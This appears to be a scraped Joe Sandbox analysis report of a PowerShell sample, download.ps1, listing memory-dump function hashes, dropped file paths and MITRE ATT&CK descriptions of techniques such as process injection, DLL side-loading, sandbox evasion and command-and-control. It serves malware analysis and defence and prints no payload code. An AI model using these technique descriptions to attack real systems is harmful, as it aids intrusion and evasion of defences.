Source File: 00000000.00000002.1861553581.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6fefacca75c8d32a61010907171538919a42363b31ca42bff923d550abbee9
Instruction ID: ba699e07e6e690411a57aeba7620f092181f4ed7ccf19754e5188a223900a01f
Opcode Fuzzy Hash: 3c6fefacca75c8d32a61010907171538919a42363b31ca42bff923d550abbee9
Instruction Fuzzy Hash: EF312223B1FB4E4BE7BCAB98547167832C1EF84310B4A00BDD40DC75A2DD18AD01A285

Function 00007FFD9B7F2A38 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc994824f06428a447bf71ef59e0ac0903e3d7e58ab4fd4f09ef413cfae5f277
Instruction ID: a4e86f6979d6fcfea5e10c92f2f62b754548de230567c54951d41b0fa5c4fab4
Opcode Fuzzy Hash: fc994824f06428a447bf71ef59e0ac0903e3d7e58ab4fd4f09ef413cfae5f277
Instruction Fuzzy Hash: 3D213B30A0CB4C4FDB58DF9C984A7E97FE0EB96321F00426FD449C3162DA749416CB91

Function 00007FFD9B7F8094 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7d761c13e75c323b6d21e26bcd34e7c8b92a43def33d7816950163c3f00de1
Instruction ID: 2092793a4c812c82a24733ec7eacf4d2288689e4e94a438fc336e67f15fac84c
Opcode Fuzzy Hash: 5a7d761c13e75c323b6d21e26bcd34e7c8b92a43def33d7816950163c3f00de1
Instruction Fuzzy Hash: B4310030A1964DCEFBB49F54CE26BF936D4FF41319F410239D44D860B2DA386A45CA55

Function 00007FFD9BA92D9C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861553581.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6309906f6ef2821297689a3142ac717528f81eaef09d9f4d56fab039af649d
Instruction ID: d750026c7921945ba89f57361ab65433a27c36fd31badf7a0879c81e87842d41
Opcode Fuzzy Hash: 6a6309906f6ef2821297689a3142ac717528f81eaef09d9f4d56fab039af649d
Instruction Fuzzy Hash: 20110232B0FA4A4FE7BDDB9894E09B877D0EF4472074A00BAD01DC75A6D959AD04A340

Function 00007FFD9B7E853F Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8bcb74cc09d970fe84531344b627726e43ad99d4faa5d35454cb7f0b498e10
Instruction ID: 0f924ce652846ada22965a1e789b2822470d142c2f7cff725085f9ba22622fb4
Opcode Fuzzy Hash: 4e8bcb74cc09d970fe84531344b627726e43ad99d4faa5d35454cb7f0b498e10
Instruction Fuzzy Hash: 70019F7171CB054FDB58DE0CE89196577E1FFE9324B10066DE18AC32A7D925F841C781

Function 00007FFD9B7E5395 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c832d5bd9ca846bfc3cb8cb3c2718d29edd4ae3a7fc57d122b0d904b8d562d84
Instruction ID: f8e3dbd1ef924f143a45355f524a44bb5f18a37690d05a59cb4acaf4e90fc644
Opcode Fuzzy Hash: c832d5bd9ca846bfc3cb8cb3c2718d29edd4ae3a7fc57d122b0d904b8d562d84
Instruction Fuzzy Hash: 0401A73020CB0C4FD748EF0CE051AA9B3E0FF85324F10056DE58AC36A5D632E881CB41

Function 00007FFD9B7F2880 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b2dffc475ae27944faee7b5c4a00715016bc570bd6c12be4917e2fb7a1d7cfb
Instruction ID: 88998784c20f31ebbcc7f7b51715356c17f3bb75afbad5462668dd097721206c
Opcode Fuzzy Hash: 6b2dffc475ae27944faee7b5c4a00715016bc570bd6c12be4917e2fb7a1d7cfb
Instruction Fuzzy Hash: DCF0E93090868D8FDB06DF7488195E57FA0FF26210B0502EBE45CC71B2DB34A554CBD2

Non-executed Functions

Function 00007FFD9B8B90D9 Relevance: 1.6, Instructions: 1557COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1856629257.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7bede5d7d22cd3f8050048f4b137f216d2252e74c80c0166534f1fb0e1b5e8
Instruction ID: 5ed83381f2f61a7c793c26487ad91648aebf490b51509e095e17e0c07a886d54
Opcode Fuzzy Hash: 0a7bede5d7d22cd3f8050048f4b137f216d2252e74c80c0166534f1fb0e1b5e8
Instruction Fuzzy Hash: 94A23931A0EB994FD7A5DB788868AB47BE1EF5A314B0904FED04DC71E3D929AC05C781

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report download.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0puetep3.t4n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sexvryeo.0di.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xonzhs1n.zy5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcr5w3oc.jbu.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\81NN4CKRNRQPPCXUKCRO.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
download.ps1